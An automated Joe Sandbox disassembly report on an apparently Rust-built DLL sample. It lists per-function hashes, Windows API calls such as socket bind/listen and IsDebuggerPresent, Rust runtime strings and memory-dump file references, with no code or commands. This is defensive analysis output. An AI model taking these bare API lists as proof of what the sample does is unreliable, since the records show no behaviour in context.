                                                                                                                                                                • Instruction ID: 72e52033519f30c31201e046862f81c4eed9972af3361fc0683e378dedb86f23
                                                                                                                                                                • Opcode Fuzzy Hash: 18762eb75c30a756e5b0847702ff5010affcd6918843845585c1fdc60b145117
                                                                                                                                                                • Instruction Fuzzy Hash: 32F1DB3164C3809BD7218F28C88179ABBF4FF99314F148E2EF99497290DB75E945DB82
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8DEADF
                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000200,CAFFFB54,00000000), ref: 6C8DEAEC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DEAFD
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DEB16
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FullNamePath
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$\Program Files$\\?\\\?\UNC\
                                                                                                                                                                • API String ID: 2482867836-4074784851
                                                                                                                                                                • Opcode ID: 0af6b89730aba5b7cfb2bd140f527269fa563d07a5fe5e3e768749f5b23523c5
                                                                                                                                                                • Instruction ID: 64c2e36f75f0e19995dca2734ffa8d72d1070f2f0fc983df99bb5016a62bfc6b
                                                                                                                                                                • Opcode Fuzzy Hash: 0af6b89730aba5b7cfb2bd140f527269fa563d07a5fe5e3e768749f5b23523c5
                                                                                                                                                                • Instruction Fuzzy Hash: 80028F71E00219CBDB20CF98DA847ADF7B1BB59318F5A8969E815EBB40D730AC45CBD1
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00001000,?,00001000), ref: 6C8DD1EC
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000), ref: 6C8DD21C
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000001,6C8DCFF7,00000000), ref: 6C8DD26D
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DD483
                                                                                                                                                                Strings
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8DD4E9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs
                                                                                                                                                                • API String ID: 3036337926-1397593039
                                                                                                                                                                • Opcode ID: 1a03a9db046164d29721878e39c3ac2917236458315f29d7b36ff763cd585adc
                                                                                                                                                                • Instruction ID: 2ff9959b99437ea9819464f926fc7630ab5dad33ff1cb1ca58445fb3333b62f3
                                                                                                                                                                • Opcode Fuzzy Hash: 1a03a9db046164d29721878e39c3ac2917236458315f29d7b36ff763cd585adc
                                                                                                                                                                • Instruction Fuzzy Hash: 56918931A297815AE7129B39C842766F7A4AFD3394F25CB2FF89072891FB30E1808755
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                 • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                • Opcode ID: b868517ce8cd2cf376b13dadc1fa9415b0adbf9435fc0650d85ee791b28d322f
                                                                                                                                                                • Instruction ID: 3686d460861b5ddc9fc2680e0c5a263895fcaea0b7c7d2c01777fe88ac200160
                                                                                                                                                                • Opcode Fuzzy Hash: b868517ce8cd2cf376b13dadc1fa9415b0adbf9435fc0650d85ee791b28d322f
                                                                                                                                                                • Instruction Fuzzy Hash: A6D25771E082288FDB65CE28CD807DAB7F5EB55348F1445EAD41DE7640EB78AA86CF40
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6C8DCB56
                                                                                                                                                                • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6C8DCB83
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000800,00000000), ref: 6C8DCC07
                                                                                                                                                                Strings
                                                                                                                                                                • NTDLL.DLL, xrefs: 6C8DCB51
                                                                                                                                                                • assertion failed: self.is_char_boundary(new_len)/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\alloc\src\string.rs, xrefs: 6C8DCDD6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                 • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFormatHandleLastMessageModule
                                                                                                                                                                • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\alloc\src\string.rs
                                                                                                                                                                • API String ID: 1273946083-2048172064
                                                                                                                                                                • Opcode ID: bd314e943cb1dc78014351f56136f7c7a388c42d6e6fe24fd9d25725cbc77aef
                                                                                                                                                                • Instruction ID: 9d70367d6b4be583f2eebf4d93e5ddbb286f2bf9528d7c46799f8888de7dc5f5
                                                                                                                                                                • Opcode Fuzzy Hash: bd314e943cb1dc78014351f56136f7c7a388c42d6e6fe24fd9d25725cbc77aef
                                                                                                                                                                • Instruction Fuzzy Hash: 5F910572E013188BDB24DFA8CE907EDBBF5BF06315F21462AE815AB681D3346945CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                 • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • Opcode ID: 8d81f1fe60c73427d847faae55ee68d9ab69495bc3c3f769d884acf350b1a978
                                                                                                                                                                • Instruction ID: 98c68c24b40c5942fd0f42859776ccff529f325cfdce0ec46c25aa7fa247cf43
                                                                                                                                                                • Opcode Fuzzy Hash: 8d81f1fe60c73427d847faae55ee68d9ab69495bc3c3f769d884acf350b1a978
                                                                                                                                                                • Instruction Fuzzy Hash: 6402A071E012199FDB24CFA9C99069EFBF1FF48354F258669D529E7780D730AA02CB90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8DCA20: WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6C8DCA4D
                                                                                                                                                                • bind.WS2_32(?,?,00000010), ref: 6C8DF9D4
                                                                                                                                                                • listen.WS2_32(?,00000080), ref: 6C8DF9E5
                                                                                                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8A5B22), ref: 6C8DF9F8
                                                                                                                                                                • closesocket.WS2_32(?), ref: 6C8DFA0F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                 • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastSocketbindclosesocketlisten
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1850986032-0
                                                                                                                                                                • Opcode ID: b04d266aceb3767422cb96c8d03ab6bf377c00ff62dd3092117321437d60142a
                                                                                                                                                                • Instruction ID: 7c4be3e8368da8440b0c7825b4231c2850f145f7788d1fea32d28a23fd866ff5
                                                                                                                                                                • Opcode Fuzzy Hash: b04d266aceb3767422cb96c8d03ab6bf377c00ff62dd3092117321437d60142a
                                                                                                                                                                • Instruction Fuzzy Hash: C741D370D08289EFCB10CF68D1806AEBBF1EF66314F15855EF895A7782E334A984D761
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6C8F1140
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6C8F120C
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C8F1225
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6C8F122F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                 • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                • Opcode ID: 40cc1f80c9f4d79fbc0de8da8791656809a12aacf4b6bd093329cab3bbade9b3
                                                                                                                                                                • Instruction ID: 97f8621e15d100d5cc953c4278c61adf7c9f72323fc2fe17e1bb536661951bbf
                                                                                                                                                                • Opcode Fuzzy Hash: 40cc1f80c9f4d79fbc0de8da8791656809a12aacf4b6bd093329cab3bbade9b3
                                                                                                                                                                • Instruction Fuzzy Hash: 443114B5D052189BDF60DFA5C9897CDBBB8AF08344F1045AEE40CAB241EB709B85CF44
                                                                                                                                                                Strings
                                                                                                                                                                • .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs, xrefs: 6C8E6715
                                                                                                                                                                • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6C8E744C
                                                                                                                                                                • ?, xrefs: 6C8E70B2
                                                                                                                                                                • __ZN, xrefs: 6C8E6BA5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                 • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                 • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$?$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                                                                                                                                                • API String ID: 0-3761308440
                                                                                                                                                                • Opcode ID: 132a5453a7f58b623b2ee1b388dbb1866cea65b046e31579e8a3e224fc5f5b2a
                                                                                                                                                                • Instruction ID: b64e9e76ea6bf136e05915f2d0d697dd89208d9ebf41ddf603ecb10e1469573b
                                                                                                                                                                • Opcode Fuzzy Hash: 132a5453a7f58b623b2ee1b388dbb1866cea65b046e31579e8a3e224fc5f5b2a
                                                                                                                                                                • Instruction Fuzzy Hash: 12821371A083559FD724CF18C98062ABBE2FFCE314F598E1DF5A59BA91D330D8458B82
                                                                                                                                                                APIs
                                                                                                                                                                • NtWriteFile.NTDLL ref: 6C8DC975
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6C8DC985
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6C8DC9A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3447438843-0
                                                                                                                                                                • Opcode ID: 8e1e7df14a0cdb36d309c31039edd8e288b724655f8e71c8014beb05933c601e
                                                                                                                                                                • Instruction ID: 483123532a59c89a9fcbc72a4d337c14a259dc13aedb6cebcdfe3ce65ed5f978
                                                                                                                                                                • Opcode Fuzzy Hash: 8e1e7df14a0cdb36d309c31039edd8e288b724655f8e71c8014beb05933c601e
                                                                                                                                                                • Instruction Fuzzy Hash: 10316F71608305AFE710CF15C984B9BBBE4EBC5358F108A2DF89997291D774EA48CB92
                                                                                                                                                                APIs
                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C8F85F3
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C8F85FD
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C8F860A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                • Opcode ID: 47aa51512ca470f91ff6be46057cd348e4f60de5ccdb258e40e2afd725bb6155
                                                                                                                                                                • Instruction ID: 6df540c6a9896a439c4866c9c591c57c9d27c9643fdb280ab623926f8ca5aac9
                                                                                                                                                                • Opcode Fuzzy Hash: 47aa51512ca470f91ff6be46057cd348e4f60de5ccdb258e40e2afd725bb6155
                                                                                                                                                                • Instruction Fuzzy Hash: 0E310674901218ABCF21DF29D988BCDBBB8BF09354F6045EAE41CA7250E7749F858F54
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: \u${$}
                                                                                                                                                                • API String ID: 0-1393841519
                                                                                                                                                                • Opcode ID: 5ab810624c0d6e13f9d8817bee09f5c9b25ad35cace7156b4c0a4de7e6ec4ac2
                                                                                                                                                                • Instruction ID: bd0c54d78a98530898ed9607a36c4999f9bf2afbb537dab644ea4dcdc5f0433a
                                                                                                                                                                • Opcode Fuzzy Hash: 5ab810624c0d6e13f9d8817bee09f5c9b25ad35cace7156b4c0a4de7e6ec4ac2
                                                                                                                                                                • Instruction Fuzzy Hash: 3A913892A1D7C48FC7034778482516A7F719E67208B0E49DFD0D2DF6E3E1298A09DBB2
                                                                                                                                                                Strings
                                                                                                                                                                • UNC\, xrefs: 6C8DE824
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8DE86D, 6C8DE8DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$UNC\
                                                                                                                                                                • API String ID: 0-3763929566
                                                                                                                                                                • Opcode ID: 0ed4fcd4a555c998cc5b6f301c6047c4bdef1514acf29abcb6d154eac0fb0436
                                                                                                                                                                • Instruction ID: 278770e4e0978d13b9edce272091862c10e7fdad08705b20929491b02734877c
                                                                                                                                                                • Opcode Fuzzy Hash: 0ed4fcd4a555c998cc5b6f301c6047c4bdef1514acf29abcb6d154eac0fb0436
                                                                                                                                                                • Instruction Fuzzy Hash: A8E12B31D0D7A04AD3218A2985C0225FBE39FC7318F6ACB6AE4F42B696D3759845C7D1
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(6C8E01D5,00000000,?,6C8DC172,?,6C8DA0EC), ref: 6C904D59
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,6C8DC172,?,6C8DA0EC), ref: 6C904D6B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                • Opcode ID: 1010dddcce1704d39650dec54568b9968835b3e04c109aac84c568056816c51d
                                                                                                                                                                • Instruction ID: 98b59916766009a8d35ce999cae345b0f4565de5b239496cf127e73fd6356685
                                                                                                                                                                • Opcode Fuzzy Hash: 1010dddcce1704d39650dec54568b9968835b3e04c109aac84c568056816c51d
                                                                                                                                                                • Instruction Fuzzy Hash: DBD05E72784224A79B201BBFB8088977BBCEBC65B2310043FFA0CC3900EB25C801C6B0
                                                                                                                                                                APIs
                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6C903AEC,?,?,00000008,?,?,6C9036EF,00000000), ref: 6C903D1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                • Opcode ID: a3352e297ac7bcda3b341ac6b587a5272ba69b66b2c6d8276fd0140383af9d6d
                                                                                                                                                                • Instruction ID: d73c299894b53a60ba992047a5692b5c84b764de37cd1bca260453620a5350fc
                                                                                                                                                                • Opcode Fuzzy Hash: a3352e297ac7bcda3b341ac6b587a5272ba69b66b2c6d8276fd0140383af9d6d
                                                                                                                                                                • Instruction Fuzzy Hash: F2B12836610609DFD705CF28C486B557BE0FF45368F25869CE8A9CF6A1C335E992CB40
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C8F1435
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                • Opcode ID: bbd3ebc71d836da8833408abc34a6c9201537b0d1a94fd145e12a02c657aca11
                                                                                                                                                                • Instruction ID: cab2260f45f9db578496cd288c540e6e1ee0e9cc448fa7637cbf53c0c2bab8fa
                                                                                                                                                                • Opcode Fuzzy Hash: bbd3ebc71d836da8833408abc34a6c9201537b0d1a94fd145e12a02c657aca11
                                                                                                                                                                • Instruction Fuzzy Hash: 89519EB1B152058FEB25CFA5C98179EB7F5FB49354F20896AC42AEB640D374D902CF50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e8425ef3308fbbb9a973039eb5b6bec761b0a40c868a224be97a5b16da31eef9
                                                                                                                                                                • Instruction ID: 75eee9b9f18e43bbc2bcb6a496cacba7b5ef36247c1858cd393f0b4da54ee1a9
                                                                                                                                                                • Opcode Fuzzy Hash: e8425ef3308fbbb9a973039eb5b6bec761b0a40c868a224be97a5b16da31eef9
                                                                                                                                                                • Instruction Fuzzy Hash: 9C41B4B5904219AFDB20DF69CD88AEABBB9EF45344F1446EDE429D3200DB349E858F10
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                • Opcode ID: de6b54a1e85419852e6e9e48d7ca94fe5ef93a8ec322f090dd9d193eedfe8e01
                                                                                                                                                                • Instruction ID: f0bf7b24f09ff5c721f00e45858c718b25f2d5e1945d1d5e5b1c07dd5e0b4e44
                                                                                                                                                                • Opcode Fuzzy Hash: de6b54a1e85419852e6e9e48d7ca94fe5ef93a8ec322f090dd9d193eedfe8e01
                                                                                                                                                                • Instruction Fuzzy Hash: D0C1C03150464A8FEB31DE68C7816AABBB1EF46398F204F19D472D7E51C732A947CB60
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
